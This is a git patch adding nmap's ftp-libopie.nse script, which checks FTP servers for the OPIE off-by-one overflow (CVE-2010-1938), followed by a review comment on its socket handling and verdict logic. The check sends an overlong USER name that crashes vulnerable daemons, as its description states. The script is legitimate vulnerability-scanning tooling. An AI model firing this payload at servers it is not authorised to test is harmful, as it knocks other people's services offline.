From 0d47952611198ef6b1163f366dc03922d20b1475 Mon Sep 17 00:00:00 2001
From: Daniel Baumann
Date: Wed, 17 Apr 2024 09:42:04 +0200
Subject: Adding upstream version 7.94+git20230807.3be01efb1+dfsg.
Signed-off-by: Daniel Baumann
---
 scripts/ftp-libopie.nse | 101 ++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 101 insertions(+)
 create mode 100644 scripts/ftp-libopie.nse
(limited to 'scripts/ftp-libopie.nse')
diff --git a/scripts/ftp-libopie.nse b/scripts/ftp-libopie.nse
new file mode 100644
index 0000000..c5dfd14
--- /dev/null
+++ b/scripts/ftp-libopie.nse
@@ -0,0 +1,101 @@
+local nmap = require "nmap"
+local shortport = require "shortport"
+local string = require "string"
+local vulns = require "vulns"
+
+description = [[
+Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow),
+a vulnerability discovered by Maksymilian Arciemowicz and Adam "pi3" Zabrocki.
+See the advisory at https://nmap.org/r/fbsd-sa-opie.
+Be advised that, if launched against a vulnerable host, this script will crash the FTPd.
+]]
+
+---
+-- @output
+-- PORT STATE SERVICE
+-- 21/tcp open ftp
+-- | ftp-libopie:
+-- | VULNERABLE:
+-- | OPIE off-by-one stack overflow
+-- | State: LIKELY VULNERABLE
+-- | IDs: CVE:CVE-2010-1938 BID:40403
+-- | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
+-- | Description:
+-- | An off-by-one error in OPIE library 2.4.1-test1 and earlier, allows remote
+-- | attackers to cause a denial of service or possibly execute arbitrary code
+-- | via a long username.
+-- | Disclosure date: 2010-05-27
+-- | References:
+-- | http://site.pi3.com.pl/adv/libopie-adv.txt
+-- | http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc
+-- | https://www.securityfocus.com/bid/40403
+-- |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1938
+--
+
+
+author = "Ange Gutek"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"vuln","intrusive"}
+
+
+portrule = shortport.port_or_service(21, "ftp")
+
+action = function(host, port)
+ local opie_vuln = {
+ title = "OPIE off-by-one stack overflow",
+ IDS = {CVE = 'CVE-2010-1938', BID = '40403'},
+ risk_factor = "High",
+ scores = {
+ CVSSv2 = "9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)",
+ },
+ description = [[
+An off-by-one error in OPIE library 2.4.1-test1 and earlier, allows remote
+attackers to cause a denial of service or possibly execute arbitrary code
+via a long username.]],
+ references = {
+ 'http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc',
+ 'http://site.pi3.com.pl/adv/libopie-adv.txt',
+ },
+ dates = {
+ disclosure = {year = '2010', month = '05', day = '27'},
+ },
+ }
+
+ local report = vulns.Report:new(SCRIPT_NAME, host, port)
+
+ local socket = nmap.new_socket()
+ local result
+ -- If we use more that 31 chars for username, ftpd will crash (quoted from the advisory).
+ local user_account = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+ local status = true
+
+ local err_catch = function()
+ socket:close()
+ end
+
+ local try = nmap.new_try(err_catch)
+
+ socket:set_timeout(10000)
+ try(socket:connect(host, port))
+
+ -- First, try a safe User so that we are sure that everything is ok
+ local payload = "USER opie\r\n"
+ try(socket:send(payload))
+
+ status, result = socket:receive_lines(1);
+ if status and not (string.match(result,"^421")) then
+
+ -- Second, try the vulnerable user account
+ local payload = "USER " .. user_account .. "\r\n"
+ try(socket:send(payload))
+
+ status, result = socket:receive_lines(1);
+ if status then
+ opie_vuln.state = vulns.STATE.NOT_VULN
+ else
+ -- if the server does not answer anymore we may have reached a stack overflow condition
+ opie_vuln.state = vulns.STATE.LIKELY_VULN
+ end
+ end
+ return report:make_output(opie_vuln)
+end
-- cgit v1.2.3
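Review bot: The socket from `nmap.new_socket()` is never closed on the normal path — `socket:close()` runs only inside `err_catch` when a `try()` fails — so every run that reaches `return report:make_output(opie_vuln)` leaves the connection open until the GC collects it; add `socket:close()` immediately before that return. The LIKELY_VULN verdict also rests on `status` being false for any reason, so a slow or rate-limiting FTPd that exhausts the 10-second timeout is reported exactly like one whose connection dropped after the long USER, which the comment `-- if the server does not answer anymore we may have reached a stack overflow condition` understates; `result` holds the error string on failure and could separate a timeout from a closed connection, e.g. `elseif result == "TIMEOUT" then` with a less confident state, though the exact error strings returned by NSE sockets should be confirmed against the nmap socket documentation. Two smaller points: the inner `local payload` shadows the one declared a few lines above (drop the second `local`), and the comment `-- If we use more that 31 chars` should read `more than`.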